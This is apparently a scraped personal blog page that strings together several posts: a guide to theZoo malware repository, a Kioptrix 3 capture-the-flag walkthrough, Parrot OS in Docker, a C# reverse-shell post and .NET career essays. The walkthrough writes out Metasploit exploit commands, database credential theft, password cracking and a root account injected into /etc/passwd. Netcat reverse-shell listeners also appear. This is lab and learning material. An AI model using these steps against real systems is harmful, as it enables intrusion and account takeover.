65.8 F
High Point
Home Blog

C# Reflection: Application Name & Version

C# Reflection: Application Name & Version

My friend Christian Caspers showed me this trick and I thought it was a great idea. I’ve always saved these values in a configuration file but this little snippet is great for pulling that information from the assembly file.

theZoo

Offensive .NET: theZoo

If you’ve never heard of theZoo and you’re in the security space with some .NET development skills this is a real treat for you. The GitHub repository, “theZoo”, is a collection of binaries and source code of captured and caged malware. Digging through this I found some .NET malware that you may want to study. Most of the code was very low level and simple. There are plenty of Remote Access Trojans (RATs) and code that anyone can learn from. You can also do debugging and static analysis to understand what these viruses do.

DISCLAIMER

As always, it is illegal to distribute malware in the United States. Be sure you are responsible and fully aware of all local, state and federal laws where you live. I am not responsible for your actions and cannot be held liable.

Most Dangerous Malware

Some of the most sophisticated malware can be found in the binaries folder. There is malware in this repository that the infamous state-sponsored APT, “The Equation Group” developed like DoubleFantasy, EquationDrug, EquationLaser, Fanny, GROK, GrayFish, and TripleFantasy.

Pulling “theZoo” from GitHub

git clone https://www.github.com/ytisf/theZoo
cd theZoo
pip install --user -r requirements.txt

When downloading the most dangerous malware on the planet, it is best practice to name the folder something you won’t forget. The name “definitelynotmalware” seems very appropriate.

Extracting the Malware

Each folder has a zip file of malware and a password file for extracting the encrypted password-protected zip file. I believe one of the reasons they did this is so antivirus won’t pick it up and quarantine the files. There is also a SHA256 file to verify that the zip file has not changed.

.NET Malware

I started digging around and found that there is a bunch of “Win32” malware that is mostly .NET. Some of it is actually C/C++.

I’ve confirmed that these libraries are .NET malware.

C/C++ Malware

  • Alina
  • AryanRAT
  • Athena
  • Carberp
  • CyberBot v2.2
  • DBot3.1
  • Dexter
  • Dokan
  • DopeBot.A
  • DopeBot.B
  • DopeBot v0.22 Crippled
  • DopeBot v0.22 UnCrippled
  • HellBot v3.0
  • IoT.Mirai
  • KINS (PHP also…)
  • LiquidBot
  • LoexBot 1.3
  • NBot
  • NullBot
  • PowerLoader
  • rBot 0.3.3
  • Rovnix
  • Rubilyn
  • ShadowBot
  • ShadowBot v3
  • W32.MyDoom.A
  • LoexBot 1.3
  • Win32.MiniPig
  • Win32.NinjaBot (Delphi??? has .pas files)
  • Win32.ogw0rm
  • Win32.Pegasus
  • Win32.Remhead (n00bkit)
  • X0R-USB
  • xTBot0.0.2
  • XtremeRAT (Delphia??? has .pas files)
  • ZeuS2.0.8.9

.NET/VB/VBS Malware

  • Blackdream
  • BShades_Fusion_Source
  • APKBinder (VB)
  • StubEng (VB)
  • PlasmaHTTP (VB)
  • Jigsaw (C# Ransomware)
  • SpazBot 2.12
  • v0lk (VB 6)
  • vbBot (VB)
  • VBS.Win32.Vabian
  • Win32.BlackWorm
  • Win32.Carbanak (C#)
  • Win32.DiamondRAT (VB)
  • Win32.LokiRAT (C#)
  • Win32.LuxNET (VB)
  • Win32.MCRYPT (C#)
  • Win32.njRAT (VB)
  • Win32.QuasarRAT (C#)
  • Win32.ShadowTech (VB)

PHP Malware

  • ExploitKit.0x88
  • ExploitKit.BlackHole.100
  • ExploitKit.BlackHole.102
  • ExploitKit.BleedingLife.2
  • ExploitKit.Crimepack 3.1.3
  • ExploitKit.DemonHunter
  • ExploitKit.Eleonore 1.4.1
  • ExploitKit.Fragus
  • ExploitKit.Phoenix 2.5
  • ExploitKit.RIG
  • ExploitKit.Sakura
  • ExploitKit.Sava (NSFW: Contains Porn)
  • Grum
  • KINS (Mostly C but has a php app)
  • Mazar (АДМИНКАМАЗАР)
  • Zemra
  • ZunkerBot 1.4.5

Python

  • ZIB Trojan

Assembly Malware

  • TinyBanker

What can you learn from theZoo’s Malware source code?

I’ve started digging into the code and some of the common things you can learn are encryption, compression, remote access control, Windows API, reverse proxies, SOCKS5, key loggers, task monitors, and more. The list is endless.

Some of these apps are capable of building new malware using .NET code. I found some of this to be the most impressive because it allows the malware to grow and upgrade itself.

CTF: Kioptrix 3

CTF: Kioptrix 3

This is another OSCP like VulnHub that was very fun to do. I didn’t have any issues rooting this one and was able to do it rather quickly.

You will get practice with:

  • nmap
  • metasploit
  • mysql client
  • file privilege escalation

Enumeration

I start off with an arp-scan to find the local machine… and it turns out that my box is 192.168.0.46. Let’s get this party started!

sudo arp-scan -l
(arp-scan)

nmap

A basic nmap scan returns a website and an ssh port. After the initial nmap scan I kick off a more thorough scan. It doesn’t tell me anything I didn’t learn some the initial scan.

# basic scan
nmap 192.168.0.46

# deeper scan
sudo nmap -p- -AO 192.168.0.46

Website

The website looks like a simple CMS. On the login page, I can see that this is a LotusCMS. I immediately search online and see there is a Metasploit vulnerability.

(website hosted on port 80)
(LotusCMS)

Exploit with Metasploit

I start up Metasploit and use the search functionality to find a module.

# start metasploit
msfconsole

# once started search for "lotuscms"
search lotuscms
# use module
use exploit/multi/http/lcms_php_exec

# show options
show options

# set options
set RHOSTS 192.168.0.46
set URI /

# exploit
run
(exploit/multi/http/lcms_php_exec)
(exploit)
(and we have access)

Pseudo Terminal

I personally prefer shell over merterpreter. It’s just more natural. I also like having the ability to clear the screen so I always set the terminal variable.

shell

python -c "import pty; pty.spawn('/bin/bash')"

export TERM=xterm
(setting terminal variable)

I immediately check the home directory to see who’s there. Then I check the /etc/passwd and take notes.

ls -la /home/

ls -la /home/dreg /home/loneferret /home/www
(checking home directory)

ALRIGHT! There’s a pretty big clue. “.sudo_as_admin_successful” means that loneferret can run something as root. That looks like the way up!

Internal Enumeration

I looked around and I didn’t see much of anything that I could exploit. I didn’t see any misconfigured file permissions that I had access to… but I did see that mysql was running and was bound locally.

I ran checksec.sh just to see what it did.

(checksec.sh)

MySQL is Running

I found MySQL running locally and the MySQL client was able to connect to it. Looks like I need to find some credentials to access the database.

netstat -ntl

I tried logging in as root to see if a password had not been set… but I wasn’t that lucky.

Exploring the LotusCMS Website

It’s fair to assume that if there is a Content Management System (CMS) running then there should be credentials to access some sort of database. MySQL is the most common database used with PHP applications. After digging around I found a gallery folder that contained a file “gconfig.php” This file was referenced in the index.php file and looked like a global configuration file.

cat gconfig.php
(gconfig.php)

OK! I now have root credentials for the MySQL server.

Time to move through the database and see what I can find.

# connect to mysql in bash
mysql -u root -h 127.0.0.1 -p
fuckeyou

# once in mysql >
show database;
use gallery;
show tables;
describe dev_accounts;
select *from dev_accounts;

(credentials found in the database)

Cracking Passwords

I took those two md5 hashes and dropped them in CrackStation to get the passwords.

Turns out their passwords are:
dreg – Mas3r
loneferret – starwars

Privilege Escalation

It’s very common for people to re-use their same passwords for logins elsewhere. While this appears to be passwords to the gallery page, it could also be a Linux user’s password. Turns out, loneferret’s password works for shell access.

ssh loneferret@192.168.0.46
starwars

I’m now in under the user, loneferret and I know this user has sudo access to an application.

sudo -l
(Checking sudo access)

So, I can run “ht” which is a terminal editor under root.

After messing around I was able to get a screen I could work on and I decided to use the same trick I used on HA: Albania and inject a user into the /etc/passwd file.

# append this to the /etc/passwd file in the ht editor
hax:$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.:0:0:hax:/root:/bin/bash

Root

Well, this just got easy… I really enjoyed this one.

su hax
asdf
cd /root
ls -la
cat flag.txt

Thanks, Steven!

Docker: Parrot OS Security

Docker: Parrot OS Security

In an effort to make Parrot OS Security more portable the creators have been experimenting with Docker. They have successfully ported an enormous amount of functionality into a Parrot OS Security Docker image. This will make running Parrot OS Security anywhere possible. Because this is running in a Linux container the graphical user tools will not be available. Currently, the security image only contains basic penetration testing tools but thus so far this is more than impressive.

Let’s Pull Some Docker Images

Just to show off how portable this is now, I’ll be using Docker on Windows with a PowerShell terminal to do all of this.

https://hub.docker.com/r/parrotsec/security

# pull main parrot os image
docker pull parrotsec/security
(Parrot OS Security Docker Image)

Accessing the ParrotSec Container

Before I access the terminal I created a folder on my root hard drive for the Docker container’s files.

# create parrotos folder
cd c:/
mkdir parrotos

Just WOW! I’m beyond impressed at this point. Things are starting to look familiar. Accessing the Docker container is very easy. I used the command below and was given a ParrotSec OS prompt.

# docker
docker run --rm -it --network host -v $PWD/work:/work parrotsec/security

Trying out the functionality

At this point, I’m dying to see what is packed into this container. Everything will obviously be accessed through shell prompt. Let’s try out some functionality!

Parrot OS Metasploit Framework in Docker

First things first! One of the most powerful tools in Parrot OS is the Metasploit framework.

# start metasploit framework
msfconsole
(Metasploit in a Parrot OS Docker Container)

Hydra, password dictionaries, rockyou.txt

Oh no! This is missing! However, it makes a lot of sense because that password dictionary is 15 GB!

I also notice hydra was not installed…

This was expected… this is a light Docker image of ParrotOS and is still incredibly powerful. Below I will show you how to install it.

(expected limited functionality..)

Installing Wordlists and Hydra is Easy

# install wordlists
apt-get update
apt install wordlists

# extract wordlists
cd /usr/share/wordlists/
gunzip rockyou.txt.gz

# install hydra
apt-get install -y hydra-gtk

Reverse Shell in Docker

Yes, it is possible to catch a reverse shell and here’s how I did it locally.

# in power shell start a container and map in port 443 to 444
docker run --rm -it --name parrot -p 443:4444 -v $PWD/work:/work parrotsec/security

# in the parrotos container start a netcat listener on 4444
nc -nvlp 4444
(Start netcat listener…)

I tried this out and it definitely works…

(catching the hook…)

Apps & Penetration Testing Tools

These are some of the apps I noticed that were available.

  • netcat
  • nmap
  • sqlmap
  • metasploit
  • dirb
  • nikto
  • wireshark CLI
  • tcpdump
  • webacoo
  • websploit
  • zuluCrypt
  • macchanger
  • weevly
  • BeEF
  • bettercap
  • dirbuster
  • dnsmap
  • dnsenum
  • ettercap
  • fierce
  • hashcat
  • john
  • htshells
  • sslstrip
  • gcc
  • git
  • geany
  • emacs
  • lua
  • vim
  • nano
  • perl
  • python
  • rsync

C# Reverse Shell

Offensive .NET: C# Reverse Shell

Creating a .NET C# reverse shell that is undetectable is very easy. In this example, I’m going to use BankSecurity’s reverse shell that I forked. This is a real basic reverse shell.

I’ll show you how to compile this and execute it to get a reverse shell in Parrot OS / Kali.

This is a sample of a Reverse Shell written in C# ASP.NET 3.5 for compatibility. I’ll roll this up into a console app and run it to demonstrate how this works. This could also be deployed as a Win Forms application without a form.

GitHub Gist: Reverse Shell C#
GitHub: Offensive .NET C#

Script

Walkthrough

You can watch the video above and see how I’m doing this but also here’s a walkthrough to show you all the commands I used to start the Netcat listener and connect to Kali in WSL.

Getting my Host Machines IP Address

To get your current machines IP address, open Power Shell and type “ipconfig“.

# powershell
ipconfig

Starting Netcat Listener in WSL

# start a netcat listener on port 443
sudo nc -nvlp 443

Exploitation

Once the reverse shell has connected to my Netcat listener I am able to run commands like “whoami” and “dir” to see what folder the process is running under. Again, this a Proof of Concept (PoC), this is running locally and would require a little modification to use in the wild.

Blend Multiple Images

Digital Painting

How to Learn Really Fast!

How to Learn Really Fast!

One of the hallmarks of my personality and best traits is that I’m a life-long-self-learner who has mastered and perfected the art of learning technology really fast. I have a very effective way of learning technologies rather quickly. This article is aimed at people who want to continuously grow within the IT-sphere.

Awareness and Finding “The Curve”

I can’t stress how important awareness is. If you are active in the IT community, attend meetups, network, read and follow things online you will have more visibility of emerging technologies, trends and will be able to spot what I call “The Curve”. There are leaders and there are followers. The people at the very top are the most innovative and take risks. Because of this, they are usually the ones who fail or succeed in creating a new technology that results in a new direction. You absolutely don’t want to be at the end of the curve; that’s where the people who don’t keep up are. They are on the edge of being deprecated. Their skill sets aren’t up-to-date and they typically are last picked during the hiring process because they aren’t keeping up and offer anything new to the company. I’ve personally seen someone who was in a dying technology and when the jobs faded out and were laid off, they had a very difficult time getting a job. This resulted in bankruptcy. Ideally, you want to be on the cusp of the curve using modern, adaptable technologies that offer a bright future for your career. You will be happier if you challenge yourself to keep up.

Being on the curve means you will have a higher awareness of the direction things are doing. This makes it much easier to understand emerging technologies because you already have an idea of where it’s headed. A lot of times other technologies make it easier to learn newer or emerging technologies. Like learning Docker before Kubernetes.

Strategy

My strategy is really simple and I have built a strong mentality for learning. I typically have a weekly routine, set goals and hop around from project to project to learn.

Setting Reasonable Goals

First, you have to be reasonable with your self and set attainable goals. Instead of trying to build the next FaceBook, maybe learn how to build websites if you’ve never built a website before. As silly as that sounds, I often see people take on things they aren’t ready for or qualified for. This isn’t the 90’s or early 2000’s anymore. Making a successful online presence is not easy now and if you don’t have at least 5 years of experience and venture capital you probably won’t succeed at starting a new online business. I would recommend having at least 10 years of experience before venturing out on your own in anything. There’s far more to it than you realize. If you’re brand new and a junior level developer, focus on being a junior level developer by learning or continuing education. The smaller you are, the smaller your bytes should be. Take byte size pieces to learn and grow. Pun intended… If you’ve never programmed before focusing on the basics will get you much further than trying to build the next APT framework.

Habits & Routines

It’s important to have a rhythm and get in a process where learning is fun, exciting and stimulating. A habit can be formed in 21 days so make reading a habit. I read every Saturday and Sunday for 1-2 hours at breakfast. I also read while I walk on the treadmill.

Staying Motivated

I keep one of the most brutal paces. I’ve been told, “You have 2 speeds; 9 and 10.”, “You’re a machine”, “Jamie Bowman Busy”, and also “you’re odd.”. Seriously, who wants to go that hard? I do…

Passion is a fire that consumes you. It comes from the gut…

Be compelled… Be motivated… Be driven…

I believe there are two types of burnouts. Those who are under-challenged and those who are over-challenged. If you are under-challenged and your work doesn’t excite you then you aren’t learning enough or stepping outside of your comfort zone. If you are over-challenged focus on a work-life balance, take routine breaks and find ways to cope and heal. Ginkgo Biloba can do wonders if you’re having issues with concentration because of extreme burnout (always consult with a doctor first).

What drives me and motivates me?

I dig deep into my soul and often reflect on the person I want to become and think about how I can help the world. I also reflect on the things I want in life. I would love to go remote and travel or own my own business one day. I believe having high skill sets will lead to that lifestyle or me having an awesome, enjoyable, challenging career.

Gratitude

Get excited and celebrate every single victory. Seriously, when I learn something new I can’t explain the feeling I get. It’s an overwhelming burst of energy. I feel closer to my goals every step of the way and cherish every moment.

Finding a Mentor

It’s important to find people who you want to become like. Just being around these people you’ll pick up on their habits and traits that make them successful. The best way to find a mentor is to get involved. Go to that meetup or start your own if they aren’t in your area. Talk to everyone and make friends. At some point, you may find someone who wants to mentor you. The people at the very top are some of the most humble, compassionate people and are often willing to help. Remember, their time is very valuable so don’t waste it… and for god sake, work your butt off to make them shine. There is nothing more satisfying than helping another person succeed. Be their reward and succeed.

Note: How to Find a Mentor in 10 Not-So-Easy Steps

Networking

It doesn’t matter what skill level you are or who you are working with. Mentoring junior developers will help senior developers develop soft skills for managing and training developers. As I have about 10 years in App Dev I started working with guys in college who were learning Information Security. As I know nothing about security, I learned tons of stuff from hanging around these guys. They are very active and committed to learning and will often share new tooling and ideas. I also frequently attend conferences. This is one of the funniest ways to network and meet people. You also get to see presentations from people who are really high up and maybe doing what you want to do… or you could learn a new thing and increase your awareness.

Meetup.com

Contributing

Get involved with open source projects and help out. This will surely get your name out there and connect you with people who can help lift your career.

Online Resources

I read constantly. I have several websites I use to keep up with news, technology and generally get ideas of what I should be learning.

App Dev / General

DevOps

Information Security & Hacking

The Real Secrets

I have a few secrets to learning. For one, I incorporate this into my everyday life. I work as a software developer and if I wasn’t being challenged and learning at my current day job I would leave. I also read while I walk on the treadmill. I’m never without my Kindle. Every Saturday and Sunday I get breakfast and read for an hour or two while eating and enjoying a change of scenery. (I often lie about what I’m reading…) Having conversations about penetration testing can get kind of awkward if you know what I mean.

Dive-In

When I learn new technologies, I hit it hard. I mean really hard. A 24-hour Udemy course gets ran through like a marathon. Yes, it sucks… but you have to motivate yourself and work through it. If something is new, I may spend a month or two on that subject before I back burner it. Once I get it down, I back burner it and then go through a refining process. I might do a little here and there but practice and repetition = memory.

Diversity

So, you’ve made it this far. If you understand how to motivate yourself and where to learn then I’m going to tell you the real secret. It’s rather simple actually. I don’t actually take a lot of breaks from learning and side projects. Instead, I constantly switch out projects and things I’m learning. I often will sit something down for a month or so and come back to it fresh and ready to go. By changing out the technologies and hopping from project to project, you will learn a lot more faster. If you’re studying one track, for example, security, then I switched from VulnHubs to doing labs on Penetration Academy. That switch increased my enthusiasm because I was able to learn exploits faster. Then I went back to VulnHub and killed it. Diversity can keep you more interested and will allow your brain to process previous things learned.

Rinse and Repeat

It’s important to have a rhythm and constantly focus on goals. If you follow my methodology and continuously learn you will see your skillsets sky-rocket over the years. It takes an enormous amount of time but if you commit to this lifestyle it will add up rather quickly.

Introduction to ASP.NET/.NET Core

Introduction to ASP.NET/.NET Core

.NET is an incredibly powerful software development framework created by Microsoft and used by some of the largest enterprise environments in the world. Originally created in 2002, it was decided to supersede Active Server Pages (ASP Classic 3.0). While .NET is very versatile it is also very “corporatey” because of its tight integration within the Windows environment. .NET is most commonly used in corporations because it’s easily integrated with Active Directory and allows for rapid and easy development of internal business apps. .NET is also suitable for a wide variety of things such as web applications, console apps, Windows services and as of recently cross-platform development with .NET core.

The Programming Languages of .NET

ASP.NET is primarily C# and Visual Basic (VB.NET), however, there is F# and support for other languages like C++. There are also extensions to allow Visual Studio, the IDE of .NET, to work with other languages such as PHP or Python.

If you are new to .NET, C# is the only one you should focus on. Visual Basic is a dying language and no one adopts this and is commonly found in legacy applications. There is some worth in learning VB but I don’t recommend it unless you are porting legacy applications to modern C#.

General Compiler Process

A lot of this is changing from ASP.NET to .NET core. In general, the idea is that the .NET compiler will compile all programming languages down to a Common Intermediate Language (CIL) that will be executed as machine code (native code) when executed.

I would suggest reading up on this…

Common Language Runtime (CLR), the virtual machine component of the .NET framework that allows Just-in-time compilation (JIT) to convert managed code to machine code.

Common Intermediate Language (CIL) formerly called Microsoft Intermediate Language (MSIL) or Intermediate Language (IL).

Visual Studio

The official IDE of .NET is Visual Studio. This comes in several versions including Community, Professional, and Enterprise. The pricing on Enterprise is very expensive, it’s about $250 dollars per month. It does come with some very advanced functionality that you can’t get in the community or Pro editions. One of the features that I miss out on while using Pro that is only available in Enterprise is the ability to stub and fake dependencies for unit testing.

CommunityProfessional (I use this…)Enterprise
FREE$50/month$250/month

(I dream that one day my blog will pay for a Visual Studio Enterprise license.)

Visual Studio Code

An alternative to Visual Studio is Visual Studio Code which is a cross-platform, completely free, language-agnostic and extremely versatile IDE that supports .NET. Visual Studio Code can be used for many things such as web development, Python, C, C++, and many other languages because it has extensions.

C# (C-Sharp)

The programming language that is most widely used in the .NET Framework is C#. I strongly recommend that you learn and use C# over other programming languages within .NET. It’s relatively easy to learn and is similar to C/C++ and Java. C# is an object-oriented programming language that is very modern. The majority of the .NET job opportunities out there will require that you know C#.

This article is not about learning the syntax of C#, it is about the .NET Framework.

https://www.w3schools.com/cs/

using System;

namespace HelloWorld
{
  class Program
  {
    static void Main(string[] args)
    {
      Console.WriteLine("Hello World!");    
    }
  }
}

ASP.NET vs .NET Core

ASP.NET will become the legacy .NET Framework while .NET core takes over. There came a point when Microsoft made one of it’s best decisions with the ASP.NET Framework; they decided to become completely cross-platform and open source. To accommodate this, ASP.NET would have to be completely re-written from the ground up. This meant they would have to decouple ASP.NET from the Windows System libraries so that it could run on other platforms like Linux. With the rebirth came a new name, .NET Core.

ASP.NET Framework 1.0

Originally released on January, 16th 2002, ASP.NET brought a fresh new set of features to developers. It originally included ASP.NET Web Forms which allowed for a Simple UI that developers could create web components that had code click behinds. This was very familiar to developers who did Win Forms applications.

ASP.NET MVC 1.0

Module View Controller (MVC) has been a software design pattern that has been around since the 1970s believe it or not. It was first introduced into Smalltalk-79 but didn’t gain popularity until it was brought into web development. MVC is now one of the most popular framework patterns for modern web development. ASP.NET MVC 1.0 was officially released on March 13th, 2009. This was a dramatic improvement over ASP.NET Web Forms and offered the first modern approach to web development.

.NET Core

The initial release date of .NET Core was June 6th, 2016. As of writing this, the current release version is .NET Core 3.1 and is really taking off.

Why is .NET core better than the ASP.NET Framework?

  • Performance
  • Cross-platform
  • portable

Performance

The performance of .NET core is amazing. When they decoupled .NET from the Windows libraries it became incredibly faster.

Just to give you an idea of how fast .NET core is, Raygun dumped Node.js for .NET core and increased their throughput by 2,000 percent.

.NET Core is Cross-platform

The biggest challenge right now is that the industry is transitioning from the legacy mindset of the ASP.NET Framework to the .NET Core Framework. The majority of libraries have not been ported to .NET core. While .NET core supports legacy libraries you can’t run legacy libraries in a cross-platform environment. I assume with time people will abandon and re-write code in .NET core. It’s only a matter of time before it’s easy to write fully cross-platform code.

Portability of .NET Core

.NET is very portable and can run without using Internet Information Services (IIS). Depending on the project a .NET core application can run on Linux.

At my current job, we are running .NET Core in Docker containers to integrate Kafka consumers and producers; orchestrated by Kubernetes in a Linux environment.

The Frameworks & Projects

The .NET Framework is amazing and can do so much more than most developers realize. I’m going to highlight the technologies I’m familiar with. If I miss something leave a comment.

ASP.NET Win Forms

Win Forms is a framework for building Windows applications, hence the name “Win Forms”. However, with the development of .NET Core, Win Forms applications will become cross-platform.

(Desktop application development with Win Forms)

Windows Presentation Foundation (WPF)

The Windows Presentation Foundation (WPF) allows developers to create desktop applications through a unified programming model. Instead of using a Form Designer you will be using a Designer that uses XAML. WPF came after Win Forms and offers several advantages. It is vector based so images, buttons and UI components scale easily to any size. The applications look better because it has built-in support for animation. The downside to using WPF over Win Forms is that it takes more effort and time.

ASP.NET Web Forms

A legacy solution that allowed the rapid development of a web application using the Simple UI. This is solutions include Windows Form Controls and components that make it easy to develop an internal business web application. This solution does not use modern JavaScript frameworks and uses postbacks to pass data.

ASP.NET/Core MVC

The MVC framework became extremely popular around 2010. I remember all of the hype, even scripting languages like PHP based their frameworks around the MVC design pattern. Now, with .NET the MVC framework included a lot of functionality that made web development much easier. Some of this included validating form data through data annotations on models.

(.NET Core MVC)

Console Applications

With .NET core you can now create cross-platform console apps that run on Linux. Console apps can be created and used to interact with services and processes.

(Windows Console Application in .NET Core)

Windows Communication Foundation (WCF)

Windows Communication Foundation (WCF) is a framework for creating service-oriented applications. The ASP.NET Framework has a lot of support for WCF and the biggest benefit I have experienced from using this is that it makes creating and consuming services within a .NET environment easier.

Some of the other features include:

  • Service Orientation
  • Interoperability
  • Data Contracts
  • Security
  • Multiple Transports and Encodings
  • Transactions
  • AJAX and REST Support
  • Extensibility

Web API & Single Page Apps (SPAs)

As web development progressed there came a need for more modern RESTful APIs within .NET. The Web API framework is the most modern approach in .NET to creating an API service. Using method attributes it’s easy to create routing paths and in general, Web API is like a Controller that is specifically designed to be stateless. Web API controllers also differ in which they use HTTP verbs to handle different requests.

Using Web API is very useful in modern web development because it’s practical for creating Single Page Apps (SPAs). These types of websites are built using reactive JavaScript frameworks like ReactJS/Redux, Angular and VueJS.

(Web API Controller)

Windows Services

Creating a Windows Service Application is a great way to have code that is managed by the Windows service manager. This results in the process being restarted if it fails, ran during startup and if the system is rebooted.

Dynamic Libraries

.NET allows for the creation of reusable dynamic libraries (DLLs) that can be shared across applications. This is really useful for porting code to different applications.

Azure Functions

With cloud computing really increasing in popularity it’s important to understand how serverless infrastructure works. Azure Functions provide the ability to place scripts in the cloud and have them run. Using Azure Functions it’s easy to create APIs that run in the cloud on serverless infrastructure.

Xamarin

Originally created by a 3rd party company and purchased by Microsoft, Xamarin is an open-source mobile app platform for .NET. It allows for the easy creation of apps that are cross-platform and visually impressive. Using Xamarin Forms to build cross-platform UIs allows the backend code to be reused across multiple platforms. With Xamarin you can build Windows, iOS and Android apps using C#.

(Xamarin Mobile App)

Advanced Techniques

People who are new may have no idea how to achieve high skill sets in .NET, but it really comes down to time and patience. Being in multiple environments and working with different applications, integrations and teams will develop strong skillsets. These are some of the things a developer will learn along the way. It takes about 10+ years to master anything and there are no shortcuts. Having awareness will increase the likelihood of becoming very talented in software.

Dependency Injection

This has become the norm within application development. Inversion of Control (IoC) follows the concept of removing dependencies from your code. By using interfaces and a Dependency Injector to automatically inject concrete classes for your interfaces, code becomes more open to unit testing and being more modular; which leads to easier management and development.

Object Relation Mappers (ORMs)

Object Relation Mappers (ORMs) are a way to easily and programmatically interface a database. There are many ORMs that you can find in the .NET ecosystem but some of the more popular ones are Entity Framework, Dapper, and NHibernate are the big ones. The interesting thing about these, they are wildly different.

Entity Framework

Entity Framework is an ORM created by Microsoft and provides multiple ways of interfacing with a database. There are two solutions they provide: Database First or Code First. With Database First, you can create your model classes from an existing database. This can be more cumbersome of a process because it creates models after the fact and you have less control over the process. There is a lot of autogenerated code. Code First is the best approach in my opinion because it gives the developer the ability to create their model classes first and is more decoupled from the database solution. There is also the Fluent API which helps Entity Framework understand relationships within the database.

Dapper

I don’t think there has ever been an ORM as powerful as Dapper. Created by Stack Exchange, this has become one of the most popular ORMs for .NET because of its incredible features. With Dapper, you have the most control. Interfacing stored procedures are easy and Dapper provides the ability to accept multiple sets of data from a stored procedure which is unheard of in other ORMs.

NHibernate

Worth mentioning is NHibernate because a lot of projects still depend on this ORM. This ORM has been around for many years and is very mature.

.NET Authentication

Authentication and authorization with any programming language or framework can get rather complicated. This is not an easy topic and takes an enormous amount of time to truly master. There are many configurations like OAuth, Single Sign-On policies, and federated services. This is certainly a rabbit hole of possibilities. With the .NET Framework, I would recommend being aware of .NET Identity Framework, Auth0, and Identity Server.

DotNetNuke / SiteCore (CMSs)

.NET does have several Content Management Systems (CMS)s that are very popular and used in many enterprise environments. They allow customizations using ASP.NET. Some CMSs use ASP.NET Web Forms and some use MVC. Make sure you read up on advanced customization to figure out which is the best fit for you.

DotNetNuke
SiteCore

Concurrency / Threading

Concurrency is the process of running many processes at the same time in parallel. There are a lot of challenges to writing multi-threaded concurrent code. Common issues include race conditions, locks, and things getting lost or mixed up. With .NET it includes the ability to create custom threads and there is also support for Asynchronous calls.

Polymorphism

The Oxford definition of polymorphism is “the condition of occurring in several forms”. Polymorphism typically takes a lot of practice to understand. The concept of polymorphism can get complicated because it relates to database design, model class design and the process of using multiple models in place of a single model. Then if you are using a controller you may have to create a custom model binder to process the data that’s being posted to the endpoint. A good example of this is what I did on a stationary website that I created. Instead of creating an endpoint to accept the data necessary to create an image of the product I use polymorphism design to create a single base abstract class that I inherited from and used a custom model binder to map data to the correct class. This resulted in a scalable architecture and significantly reduced code.

Reflection

Reflection isn’t something that I have seen on many projects, it’s actually rather rare. I’ve used reflection in several situations which include writing plugins, reflecting to find classes with custom attributes, and unit testing. Using Reflection in .NET allows a developer to open DLL files, search for private or public methods and then call those methods. This is extremely useful in unit testing private methods.

Integrations

In theory, there could be an infinite amount of applications that a developer could integrate with but it’s important to recognize what common integrations look like. In several environments, I have integrated with Dynamics CRM where sales data was being pushed into CRM through an API. For example, if an order is placed on a website it may be pushed through an integration that places that information into CRM so customer service can be aware of an order. Other types of integrations could include data streaming with platforms like Apache Kafka.

Lexical Parsers

Lexical analysis is the process of converting a sequence of characters into a sequence of tokens. If you were to create an application or library that parsed text as commands or your own programming language you would need to create a tokenizer to process those commands.

Jack Vanlightly – Creating a Simple Tokenizer (Lexer) in C#

Jack wrote a great article about how to create a Logging Query Language (LQL) and a lexical parser to analyze the language.

NuGet Libraries

NuGet is a dependency manager for .NET libraries. Anyone can produce a shareable library (DLL) that can be published to a public NuGet repository and included in a project. There are also private NuGet repositories that companies can use to create and distribute code within the organization. An example of this would be re-sharing a custom logging utility class. Supposed the organization you work for wants every application to use the same exact code. This can be done with a private NuGet repository.

(NuGet Repositories)

Unit Testing

Mastering unit testing is actually more difficult than most developers realize. While in concept it’s rather easy to write unit tests but it’s more than just that. Writing unit-testable code means truly understanding SOLID principles, Dependency Injection, decoupling your code and understanding Test-Driven Development (TDD). Then a developer needs to have strong skillsets with Reflection, using Visual Studio Enterprise with Stubs and Fakes, be very experienced in many unit testing frameworks such as MSTest, xUnit.NET, NUnit, and nSpec (Behavioural Driven Design). Now, this covers a lot of territories and focuses only on using code to do unit tests. A developer also needs to understand build servers, gated check-ins, Continous Integration (CI), TFS (Now called Azure DevOps Server), Jira, along with general testing practices like Integration Testing, Acceptance and Specification.

Windows Internals

Most .NET jobs will be web applications but there are jobs that require high-level knowledge of how Windows actually works under the hood. Offensive Penetration Testers who roll their own code will need to become familiar with hooking into the Windows APIs. A .NET keylogger would need to hook into system events for key presses and this can be done by interacting with the Windows APIs.

Windows Internals Part 2 (Releases: July 16th, 2020)

This is an excellent read if you want to gain more knowledge of how the Windows kernel works.

https://www.amazon.com/Windows-Internals-Part-2-7th/dp/0135462401/ref=sr_1_3?dchild=1&keywords=windows+internals&qid=1584320195&sr=8-3

Udemy Videos

Anyone who knows me, knows I watch a lot of Udemy videos. I’m a big spender on Udemy and have spent thousands of dollars on videos I will soon watch one day. In all seriousness, these are more advanced curriculums but I recommend these videos.

Who to follow in InfoSec

Who to follow in InfoSec

As I’m learning InfoSec to further expand my software development career and delve into DevOps I’ve found some very knowledgeable people to follow in the industry. These people range from penetration testers to OSINT, malware analysis, and ethical hackers.

Penetration Testers / Hackers

Kody Kinzie

This guy is my #1 go-to for learning. Kody is exceptionally committed to learning and is the main contributor to Null Byte.

Jesse Kurus

His Udemy courses are great and can certainly help you prepare for the OSCP certification exam.

IppSec

A lot of HackTheBox information can be learned from this person.

Jolanda De Koff

She shares a lot of great articles and creates her own python scripts.

The Cyber Mentor

This guy is fresh and got started in about 2015 but he puts a lot of content out and is having success with getting followers.

Malware / Exploits

Binni Shah

Binni shares an incredible amount of quality articles related to the InfoSec community. She has a background in malware analysis.

Azeria

OSINT

YouTube Channels to Subscribe to for Hacking

Charlotte, NC

If you’re in the area the local OWASP meetup is really good.

Rob Taylor

Rob has been the OWASP chapter leader as far as I can remember. I met him around 2015 and he is extremely active in the local community.

https://www.linkedin.com/in/rtaylorjr/

Software Developer, Designer, WordPress, XRM, InfoSec, DevOps, Hapkidoist and Explorer

WEATHER

High Point
overcast clouds
65.8 ° F
69.8 °
60.8 °
42 %
2.2mph
90 %
Tue
60 °
Wed
54 °
Thu
62 °
Fri
62 °
Sat
54 °

POPULAR ARTICLES